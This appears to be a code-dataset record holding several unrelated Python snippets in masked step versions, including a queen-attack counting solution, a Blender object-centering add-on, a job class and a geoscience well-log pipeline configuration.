len(days[0])\n minHeap = [(0,0)]\n for weeks in range(m):\n visited = set()\n temp = []\n while len(temp) < n and minHeap:\n vac,city = heapq.heappop(minHeap)\n for nxt in nexts[city]:\n if nxt not in visited:\n visited.add(nxt)\n heapq.heappush(temp,(vac-days[nxt][weeks],nxt))\n minHeap = temp\n vac,city = heapq.heappop(minHeap)\n return -vac\n \n \n \n \n",
"step-2": null,
"step-3": null,
"step-4": null,
"step-5": null,
"step-ids": [
0
]
}
|
[
0
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
for _ in range(numberOfObs):
obs = input().split()
obstacle.append((int(obs[0]), int(obs[1])))
<|reserved_special_token_0|>
while 1 <= q <= board and 1 <= r <= board:
if (q, r) in obstacle:
break
else:
boxes += 1
q -= 1
while 1 <= s <= board and 1 <= t <= board:
if (s, t) in obstacle:
break
else:
boxes += 1
s += 1
while 1 <= u <= board and 1 <= v <= board:
if (u, v) in obstacle:
break
else:
boxes += 1
v -= 1
while 1 <= w <= board and 1 <= x <= board:
if (w, x) in obstacle:
break
else:
boxes += 1
x += 1
while 1 <= o <= board and 1 <= p <= board:
if (o, p) in obstacle:
break
else:
boxes += 1
o += 1
p += 1
while 1 <= m <= board and 1 <= n <= board:
if (m, n) in obstacle:
break
else:
boxes += 1
m -= 1
n -= 1
while 1 <= k <= board and 1 <= l <= board:
if (k, l) in obstacle:
break
else:
boxes += 1
k -= 1
l += 1
while 1 <= i <= board and 1 <= j <= board:
if (i, j) in obstacle:
break
else:
boxes += 1
i += 1
j -= 1
print(boxes - 8)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
nk = input().split()
board = int(nk[0])
numberOfObs = int(nk[1])
roco = input().split()
obstacle = []
row = int(roco[0])
col = int(roco[1])
for _ in range(numberOfObs):
obs = input().split()
obstacle.append((int(obs[0]), int(obs[1])))
q = row
r = col
s = row
t = col
u = row
v = col
w = row
x = col
k = row
l = col
i = row
j = col
m = row
n = col
o = row
p = col
boxes = 0
while 1 <= q <= board and 1 <= r <= board:
if (q, r) in obstacle:
break
else:
boxes += 1
q -= 1
while 1 <= s <= board and 1 <= t <= board:
if (s, t) in obstacle:
break
else:
boxes += 1
s += 1
while 1 <= u <= board and 1 <= v <= board:
if (u, v) in obstacle:
break
else:
boxes += 1
v -= 1
while 1 <= w <= board and 1 <= x <= board:
if (w, x) in obstacle:
break
else:
boxes += 1
x += 1
while 1 <= o <= board and 1 <= p <= board:
if (o, p) in obstacle:
break
else:
boxes += 1
o += 1
p += 1
while 1 <= m <= board and 1 <= n <= board:
if (m, n) in obstacle:
break
else:
boxes += 1
m -= 1
n -= 1
while 1 <= k <= board and 1 <= l <= board:
if (k, l) in obstacle:
break
else:
boxes += 1
k -= 1
l += 1
while 1 <= i <= board and 1 <= j <= board:
if (i, j) in obstacle:
break
else:
boxes += 1
i += 1
j -= 1
print(boxes - 8)
<|reserved_special_token_1|>
<|reserved_special_token_0|>
from math import gcd
import numpy as np
nk = input().split()
board = int(nk[0])
numberOfObs = int(nk[1])
roco = input().split()
obstacle = []
row = int(roco[0])
col = int(roco[1])
for _ in range(numberOfObs):
obs = input().split()
obstacle.append((int(obs[0]), int(obs[1])))
q = row
r = col
s = row
t = col
u = row
v = col
w = row
x = col
k = row
l = col
i = row
j = col
m = row
n = col
o = row
p = col
boxes = 0
while 1 <= q <= board and 1 <= r <= board:
if (q, r) in obstacle:
break
else:
boxes += 1
q -= 1
while 1 <= s <= board and 1 <= t <= board:
if (s, t) in obstacle:
break
else:
boxes += 1
s += 1
while 1 <= u <= board and 1 <= v <= board:
if (u, v) in obstacle:
break
else:
boxes += 1
v -= 1
while 1 <= w <= board and 1 <= x <= board:
if (w, x) in obstacle:
break
else:
boxes += 1
x += 1
while 1 <= o <= board and 1 <= p <= board:
if (o, p) in obstacle:
break
else:
boxes += 1
o += 1
p += 1
while 1 <= m <= board and 1 <= n <= board:
if (m, n) in obstacle:
break
else:
boxes += 1
m -= 1
n -= 1
while 1 <= k <= board and 1 <= l <= board:
if (k, l) in obstacle:
break
else:
boxes += 1
k -= 1
l += 1
while 1 <= i <= board and 1 <= j <= board:
if (i, j) in obstacle:
break
else:
boxes += 1
i += 1
j -= 1
print(boxes - 8)
<|reserved_special_token_1|>
'''a,b = input().split()
a, b = [int(a),int(b)]
List = set()
ArrayA = list(map(int, input().split()))
temp = 1
ArrayB = list(map(int, input().split()))
for i in range(max(ArrayA), min(ArrayB)+1):
for j in ArrayA:
if i%j is 1:
temp += 1
if temp is len(ArrayA):
List.add(i)
temp=1
newList = list(List)
temp = 1
newSet = set()
for i in newList:
for j in ArrayB:
if j%i==1:
temp+=1
if temp is len(ArrayB):
newSet.add(i)
temp=1
print(len(list(newSet)))
'''
'''nm = input().split( "-" )
a = (nm[1])
b = (nm[1])
print(nm)'''
'''x1, v1, x2, v2 = input().split()
x1, v1, x2, v2 = [int(x1),int(v1),int(x2),int(v2)]
if (x1<x2 and v1<v2) or (x2>x1 and v2>v1) or v1 is v2:
print("NO")
exit(1)
diff = 1
while True:
x1 += v1
x2 += v2
diff = x2 - x1
if diff < 1:
print("NO")
break
elif diff is 1:
print("YES")
break'''
#Graph Explaorartion
'''
import numpy as np
import matplotlib.pyplot as plt
N = 5
menMeans = (20, 35, 30, 35, 27)
menStd = (2, 3, 4, 1, 2)
ind = np.arange(N) # the x locations for the groups
width = 1.35 # the width of the bars
fig = plt.figure()
ax = fig.add_subplot(111)
rects1 = ax.bar(ind, menMeans, width, color='royalblue', yerr=menStd)
womenMeans = (25, 32, 34, 20, 25)
womenStd = (3, 5, 2, 3, 3)
rects2 = ax.bar(ind+width, womenMeans, width, color='seagreen', yerr=womenStd)
# add some
ax.set_ylabel('Scores')
ax.set_title('Scores by group and gender')
ax.set_xticks(ind + width / 2)
ax.set_xticklabels( ('G1', 'G2', 'G3', 'G4', 'G5') )
ax.legend( (rects1[1], rects2[1]), ('Men', 'Women') )
plt.show()
'''
from math import gcd
# from functools import reduce
# for _ in range(int(input())):
# N = int(input())
# print(reduce(lambda x,y: x*y//gcd(x,y), range(1,N+1)))
import numpy as np
nk = input().split()
board = int(nk[0])
numberOfObs = int(nk[1])
roco = input().split()
obstacle = []
row = int(roco[0])
col = int(roco[1])
for _ in range(numberOfObs):
obs = input().split()
obstacle.append((int(obs[0]), int((obs[1]))))
#up
q = row
r = col
#down
s = row
t = col
#left
u = row
v = col
#right
w = row
x = col
#upper right
k = row
l = col
#lower left
i = row
j = col
#upperleft
m = row
n = col
#lower right
o = row
p = col
boxes = 0
while (1 <= q <= board) and (1 <= r <= board):
if (q, r) in obstacle:
break
else:
boxes += 1
q -= 1
while (1 <= s <= board) and (1 <= t <= board):
if (s, t) in obstacle:
break
else:
boxes += 1
s += 1
while (1 <= u <= board) and (1 <= v <= board):
if (u, v) in obstacle:
break
else:
boxes += 1
v -= 1
while (1 <= w <= board) and (1 <= x <= board):
if (w, x) in obstacle:
break
else:
boxes += 1
x += 1
while (1 <= o <= board) and (1 <= p <= board):
if (o, p) in obstacle:
break
else:
boxes += 1
o += 1
p += 1
while (1 <= m <= board) and (1 <= n <= board):
if (m, n) in obstacle:
break
else:
boxes += 1
m -= 1
n -= 1
while (1 <= k <= board) and (1 <= l <= board):
if (k, l) in obstacle:
break
else:
boxes += 1
k -= 1
l += 1
while (1 <= i <=board) and (1 <= j <= board):
if (i,j) in obstacle:
break
else:
boxes += 1
i += 1
j -= 1
print(boxes - 8)
|
flexible
|
{
"blob_id": "73d02615863826d77d65fbf0314dc71acb97ef28",
"index": 4035,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int(obs[1])))\n<mask token>\nwhile 1 <= q <= board and 1 <= r <= board:\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile 1 <= s <= board and 1 <= t <= board:\n if (s, t) in obstacle:\n break\n else:\n boxes += 1\n s += 1\nwhile 1 <= u <= board and 1 <= v <= board:\n if (u, v) in obstacle:\n break\n else:\n boxes += 1\n v -= 1\nwhile 1 <= w <= board and 1 <= x <= board:\n if (w, x) in obstacle:\n break\n else:\n boxes += 1\n x += 1\nwhile 1 <= o <= board and 1 <= p <= board:\n if (o, p) in obstacle:\n break\n else:\n boxes += 1\n o += 1\n p += 1\nwhile 1 <= m <= board and 1 <= n <= board:\n if (m, n) in obstacle:\n break\n else:\n boxes += 1\n m -= 1\n n -= 1\nwhile 1 <= k <= board and 1 <= l <= board:\n if (k, l) in obstacle:\n break\n else:\n boxes += 1\n k -= 1\n l += 1\nwhile 1 <= i <= board and 1 <= j <= board:\n if (i, j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n",
"step-3": "<mask token>\nnk = input().split()\nboard = int(nk[0])\nnumberOfObs = int(nk[1])\nroco = input().split()\nobstacle = []\nrow = int(roco[0])\ncol = int(roco[1])\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int(obs[1])))\nq = row\nr = col\ns = row\nt = col\nu = row\nv = col\nw = row\nx = col\nk = row\nl = col\ni = row\nj = col\nm = row\nn = col\no = row\np = col\nboxes = 0\nwhile 1 <= q <= board and 1 <= r <= board:\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile 1 <= s <= board and 1 <= t <= board:\n if (s, t) in obstacle:\n break\n else:\n boxes += 1\n s += 1\nwhile 1 <= u <= board and 1 <= v <= board:\n if (u, v) in obstacle:\n break\n else:\n boxes += 1\n v -= 1\nwhile 1 <= w <= board and 1 <= x <= board:\n if (w, x) in obstacle:\n break\n else:\n boxes += 1\n x += 1\nwhile 1 <= o <= board and 1 <= p <= board:\n if (o, p) in obstacle:\n break\n else:\n boxes += 1\n o += 1\n p += 1\nwhile 1 <= m <= board and 1 <= n <= board:\n if (m, n) in obstacle:\n break\n else:\n boxes += 1\n m -= 1\n n -= 1\nwhile 1 <= k <= board and 1 <= l <= board:\n if (k, l) in obstacle:\n break\n else:\n boxes += 1\n k -= 1\n l += 1\nwhile 1 <= i <= board and 1 <= j <= board:\n if (i, j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n",
"step-4": "<mask token>\nfrom math import gcd\nimport numpy as np\nnk = input().split()\nboard = int(nk[0])\nnumberOfObs = int(nk[1])\nroco = input().split()\nobstacle = []\nrow = int(roco[0])\ncol = int(roco[1])\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int(obs[1])))\nq = row\nr = col\ns = row\nt = col\nu = row\nv = col\nw = row\nx = col\nk = row\nl = col\ni = row\nj = col\nm = row\nn = col\no = row\np = col\nboxes = 0\nwhile 1 <= q <= board and 1 <= r <= board:\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile 1 <= s <= board and 1 <= t <= board:\n if (s, t) in obstacle:\n break\n else:\n boxes += 1\n s += 1\nwhile 1 <= u <= board and 1 <= v <= board:\n if (u, v) in obstacle:\n break\n else:\n boxes += 1\n v -= 1\nwhile 1 <= w <= board and 1 <= x <= board:\n if (w, x) in obstacle:\n break\n else:\n boxes += 1\n x += 1\nwhile 1 <= o <= board and 1 <= p <= board:\n if (o, p) in obstacle:\n break\n else:\n boxes += 1\n o += 1\n p += 1\nwhile 1 <= m <= board and 1 <= n <= board:\n if (m, n) in obstacle:\n break\n else:\n boxes += 1\n m -= 1\n n -= 1\nwhile 1 <= k <= board and 1 <= l <= board:\n if (k, l) in obstacle:\n break\n else:\n boxes += 1\n k -= 1\n l += 1\nwhile 1 <= i <= board and 1 <= j <= board:\n if (i, j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n",
"step-5": "'''a,b = input().split()\na, b = [int(a),int(b)]\nList = set()\nArrayA = list(map(int, input().split()))\ntemp = 1\nArrayB = list(map(int, input().split()))\nfor i in range(max(ArrayA), min(ArrayB)+1):\n for j in ArrayA:\n if i%j is 1:\n temp += 1\n\n if temp is len(ArrayA):\n List.add(i)\n temp=1\nnewList = list(List)\ntemp = 1\nnewSet = set()\nfor i in newList:\n for j in ArrayB:\n if j%i==1:\n temp+=1\n if temp is len(ArrayB):\n newSet.add(i)\n temp=1\n\nprint(len(list(newSet)))\n'''\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n'''nm = input().split( \"-\" )\na = (nm[1])\nb = (nm[1])\nprint(nm)'''\n\n\n\n\n\n\n\n'''x1, v1, x2, v2 = input().split()\nx1, v1, x2, v2 = [int(x1),int(v1),int(x2),int(v2)]\nif (x1<x2 and v1<v2) or (x2>x1 and v2>v1) or v1 is v2:\n print(\"NO\")\n exit(1)\ndiff = 1\nwhile True:\n x1 += v1\n x2 += v2\n diff = x2 - x1\n if diff < 1:\n print(\"NO\")\n break\n elif diff is 1:\n print(\"YES\")\n break'''\n#Graph Explaorartion\n'''\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nN = 5\nmenMeans = (20, 35, 30, 35, 27)\nmenStd = (2, 3, 4, 1, 2)\n\nind = np.arange(N) # the x locations for the groups\nwidth = 1.35 # the width of the bars\n\nfig = plt.figure()\nax = fig.add_subplot(111)\nrects1 = ax.bar(ind, menMeans, width, color='royalblue', yerr=menStd)\n\nwomenMeans = (25, 32, 34, 20, 25)\nwomenStd = (3, 5, 2, 3, 3)\nrects2 = ax.bar(ind+width, womenMeans, width, color='seagreen', yerr=womenStd)\n\n# add some\nax.set_ylabel('Scores')\nax.set_title('Scores by group and gender')\nax.set_xticks(ind + width / 2)\nax.set_xticklabels( ('G1', 'G2', 'G3', 'G4', 'G5') )\n\nax.legend( (rects1[1], rects2[1]), ('Men', 'Women') )\n\nplt.show()\n'''\nfrom math import gcd\n# from functools import reduce\n\n# for _ in range(int(input())):\n# N = int(input())\n# print(reduce(lambda x,y: x*y//gcd(x,y), range(1,N+1)))\nimport numpy as np\nnk = input().split()\nboard = int(nk[0])\nnumberOfObs = int(nk[1])\nroco = input().split()\nobstacle = []\nrow = int(roco[0])\ncol = int(roco[1])\nfor _ in range(numberOfObs):\n obs = input().split()\n obstacle.append((int(obs[0]), int((obs[1]))))\n#up\nq = row\nr = col\n#down\ns = row\nt = col\n#left\nu = row\nv = col\n#right\nw = row\nx = col\n#upper right\nk = row\nl = col\n#lower left\ni = row\nj = col\n#upperleft\nm = row\nn = col\n#lower right\no = row\np = col\nboxes = 0\nwhile (1 <= q <= board) and (1 <= r <= board):\n if (q, r) in obstacle:\n break\n else:\n boxes += 1\n q -= 1\nwhile (1 <= s <= board) and (1 <= t <= board):\n if (s, t) in obstacle:\n break\n else:\n\n\n boxes += 1\n s += 1\nwhile (1 <= u <= board) and (1 <= v <= board):\n if (u, v) in obstacle:\n break\n else:\n\n boxes += 1\n v -= 1\nwhile (1 <= w <= board) and (1 <= x <= board):\n if (w, x) in obstacle:\n break\n else:\n\n boxes += 1\n x += 1\nwhile (1 <= o <= board) and (1 <= p <= board):\n if (o, p) in obstacle:\n break\n else:\n\n boxes += 1\n o += 1\n p += 1\nwhile (1 <= m <= board) and (1 <= n <= board):\n if (m, n) in obstacle:\n break\n else:\n\n boxes += 1\n m -= 1\n n -= 1\nwhile (1 <= k <= board) and (1 <= l <= board):\n if (k, l) in obstacle:\n break\n else:\n\n boxes += 1\n k -= 1\n l += 1\nwhile (1 <= i <=board) and (1 <= j <= board):\n if (i,j) in obstacle:\n break\n else:\n boxes += 1\n i += 1\n j -= 1\nprint(boxes - 8)\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import bpy
bl_info = {
"name": "Ratchets Center All Objects",
"author": "Ratchet3789",
"version": (0, 1, 0),
"description": "Centers all selected objects. Built for Game Development.",
"category": "Object",
}
class CenterOriginToZero(bpy.types.Operator):
"""Center all objects script""" # blender will use this as a tooltip for menu items and buttons.
bl_idname = "object.center_all_in_level" # unique identifier for buttons and menu items to reference.
bl_label = "Center Origin (Zero)" # display name in the interface.
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
# execute() is called by blender when running the operator.
def execute(self, context):
# The original script
for x in bpy.context.selected_objects:
x.location = (0, 0, 0)
# this lets blender know the operator finished successfully.
return {'FINISHED'}
class SnapMeshToOrigin(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = "object.snap_to_origin"
bl_label = "Center Mesh (Zero)"
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
return {'FINISHED'}
class AbsoluteCenterObjects(bpy.types.Operator):
"""ABSOLUTE Zero of all objects within the scene"""
bl_idname = "object.absolute_center_all_in_level"
bl_label = "Center All (Zero)"
bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.
def execute(self, context):
for x in bpy.context.selected_objects:
x.select = True
bpy.ops.object.origin_set(type="GEOMETRY_ORIGIN")
x.location = (0, 0, 0)
return {'FINISHED'}
def register():
bpy.utils.register_class(CenterOriginToZero)
bpy.utils.register_class(SnapMeshToOrigin)
bpy.utils.register_class(AbsoluteCenterObjects)
def unregister():
bpy.utils.unregister_class(CenterOriginToZero)
bpy.utils.unregister_class(SnapMeshToOrigin)
bpy.utils.unregister_class(AbsoluteCenterObjects)
# This allows you to run the script directly from blenders text editor
# to test the addon without having to install it.
if __name__ == "__main__":
register()
|
normal
|
{
"blob_id": "f7a511beaea869cf32eb905a4f3685077297a5ec",
"index": 1654,
"step-1": "<mask token>\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\"\n bl_idname = 'object.center_all_in_level'\n bl_label = 'Center Origin (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\n\ndef unregister():\n bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\"\n bl_idname = 'object.center_all_in_level'\n bl_label = 'Center Origin (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\n\ndef unregister():\n bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n\nif __name__ == '__main__':\n register()\n",
"step-4": "<mask token>\nbl_info = {'name': 'Ratchets Center All Objects', 'author': 'Ratchet3789',\n 'version': (0, 1, 0), 'description':\n 'Centers all selected objects. Built for Game Development.', 'category':\n 'Object'}\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\"\n bl_idname = 'object.center_all_in_level'\n bl_label = 'Center Origin (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.snap_to_origin'\n bl_label = 'Center Mesh (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n return {'FINISHED'}\n\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = 'object.absolute_center_all_in_level'\n bl_label = 'Center All (Zero)'\n bl_options = {'REGISTER', 'UNDO'}\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type='GEOMETRY_ORIGIN')\n x.location = 0, 0, 0\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\n\ndef unregister():\n bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n\nif __name__ == '__main__':\n register()\n",
"step-5": "import bpy\nbl_info = {\n \"name\": \"Ratchets Center All Objects\",\n \"author\": \"Ratchet3789\",\n \"version\": (0, 1, 0),\n \"description\": \"Centers all selected objects. Built for Game Development.\",\n \"category\": \"Object\",\n}\n\n\nclass CenterOriginToZero(bpy.types.Operator):\n \"\"\"Center all objects script\"\"\" # blender will use this as a tooltip for menu items and buttons.\n bl_idname = \"object.center_all_in_level\" # unique identifier for buttons and menu items to reference.\n bl_label = \"Center Origin (Zero)\"\t\t\t# display name in the interface.\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n # execute() is called by blender when running the operator.\n def execute(self, context):\n\n # The original script\n for x in bpy.context.selected_objects:\n x.location = (0, 0, 0)\n # this lets blender know the operator finished successfully.\n return {'FINISHED'}\n\nclass SnapMeshToOrigin(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = \"object.snap_to_origin\"\n bl_label = \"Center Mesh (Zero)\"\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n def execute(self, context):\n \n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type=\"GEOMETRY_ORIGIN\")\n return {'FINISHED'}\n\nclass AbsoluteCenterObjects(bpy.types.Operator):\n \"\"\"ABSOLUTE Zero of all objects within the scene\"\"\"\n bl_idname = \"object.absolute_center_all_in_level\"\n bl_label = \"Center All (Zero)\"\n bl_options = {'REGISTER', 'UNDO'} # enable undo for the operator.\n\n def execute(self, context):\n for x in bpy.context.selected_objects:\n x.select = True\n bpy.ops.object.origin_set(type=\"GEOMETRY_ORIGIN\")\n x.location = (0, 0, 0)\n return {'FINISHED'}\n\n\ndef register():\n bpy.utils.register_class(CenterOriginToZero)\n bpy.utils.register_class(SnapMeshToOrigin)\n bpy.utils.register_class(AbsoluteCenterObjects)\n\ndef unregister():\n bpy.utils.unregister_class(CenterOriginToZero)\n bpy.utils.unregister_class(SnapMeshToOrigin)\n bpy.utils.unregister_class(AbsoluteCenterObjects)\n\n# This allows you to run the script directly from blenders text editor\n# to test the addon without having to install it.\nif __name__ == \"__main__\":\n register()\n",
"step-ids": [
10,
14,
15,
16,
18
]
}
|
[
10,
14,
15,
16,
18
] |
class Job:
def __init__(self, id, duration, tickets):
self.id = id
self.duration = duration
self.tickets = tickets
def run(self, time_slice):
self.duration -= time_slice
def done(self):
return self.duration <= 0
|
normal
|
{
"blob_id": "cf7bd8aa9c92d1c3acb9ccc1658d66fa0e7a142d",
"index": 3777,
"step-1": "class Job:\n <mask token>\n <mask token>\n <mask token>\n",
"step-2": "class Job:\n <mask token>\n\n def run(self, time_slice):\n self.duration -= time_slice\n <mask token>\n",
"step-3": "class Job:\n <mask token>\n\n def run(self, time_slice):\n self.duration -= time_slice\n\n def done(self):\n return self.duration <= 0\n",
"step-4": "class Job:\n\n def __init__(self, id, duration, tickets):\n self.id = id\n self.duration = duration\n self.tickets = tickets\n\n def run(self, time_slice):\n self.duration -= time_slice\n\n def done(self):\n return self.duration <= 0\n",
"step-5": null,
"step-ids": [
1,
2,
3,
4
]
}
|
[
1,
2,
3,
4
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
PROJECT_ID = 'aaet-geoscience-dev'
DATA_PATH = '/home/airflow/gcs/data/tmp'
CREDENTIALS_JSON = 'keys/composer_las_merge.json'
BUCKET_LAS_MERGE = 'las_merged'
BUCKET_LAS_SPLICE = 'us-central1-lithos-dev-94beb3d4-bucket'
COMPOSER_FOLDER = 'data/logqc_landing'
TMP_FOLDER = 'data/tmp'
BUCKET_JOB = 'log_splice_tool_jobs'
BIGQUERY_DATASET_ID = 'urc_jobs'
BIGQUERY_TABLE_ID = 'jobs'
tpt_workflow_type = 'tpt'
logsplice_workflow_type = 'logsplice'
logqc_workflow_type = 'logqc'
geomech_workflow_type = 'geomech'
N_PROCESSORS = 16
MOVING_AVG_WINDOW_SIZE = 11
MISSING = -999.0
COL_DICT = {'cal': ['CAL', 'CALI', 'CALX', 'HCAL', 'TGS_CALX', 'RAW_CALX'],
'dtc': ['DT', 'DT24', 'DTC', 'TGS_DT', 'TGS_DTC', 'RAW_DT', 'RAW_DTC'],
'rdeep': ['ILT90', 'LLD', 'RDEEP', 'RES', 'RES_DEEP', 'AHT90', 'AT90',
'ILD', 'ILT90', 'LLD', 'ILO90', 'ILF90', 'LLMD'], 'rhob': ['DEN',
'RHOB', 'RHOZ', 'ZDEN', 'ZDNC', 'TGS_RHOB', 'RAW_RHOB'], 'drho': [
'DRHO', 'HDRA', 'ZCOR'], 'gr': ['APC_GR_NRM', 'GAMM', 'GR', 'GR_R',
'GRR', 'SGR', 'SGRR', 'CGR'], 'nphil': ['CNCF', 'NEU', 'NPOR', 'NPHI',
'NPHIL', 'TNPH', 'TGS_NPHI', 'NPHI_LS', 'TNPH_LS', 'RAW_NPHI'], 'pe': [
'PE', 'PEF', 'PEFZ', 'TGS_PE', 'RAW_PE']}
RDEEP_TYPE_LIST = ['rdeep_ltrl', 'rdeep_indct', 'rdeep_unknown']
RDEEP_TYPE_DICT = {'rdeep_ltrl': 1, 'rdeep_indct': 2, 'rdeep_unknown': 3}
CURVE_DESC = {'DEPT': 'Depth', 'CAL': 'Caliper', 'DRHO':
'Density Correction', 'DTC': 'Compressional Wave Slowness', 'DTS':
'Shear Wave Slowness', 'GR': 'Gamma Ray', 'NPHI': 'Neutron Porosity',
'NPHIL': 'Neutron Porosity', 'PE': 'Photoelectric Effect', 'RDEEP':
'Deep Resistivity', 'RDEEP_LTRL': 'Laterolog Resistivity',
'RDEEP_INDCT': 'Induction Resistivity', 'RDEEP_UNKNOWN':
'Unknown Resistivity (Laterolog or Induction)', 'RDEEP_TYPE':
'RDEEP Type 1:Laterolog 2:Induction 3:Unknown', 'RHOB': 'Bulk Density',
'RUGOSITY': 'Borehole Rugosity', 'RUGOSITY_BHF':
'Rugosity Bad Hole Flag', 'DRHO_BHF':
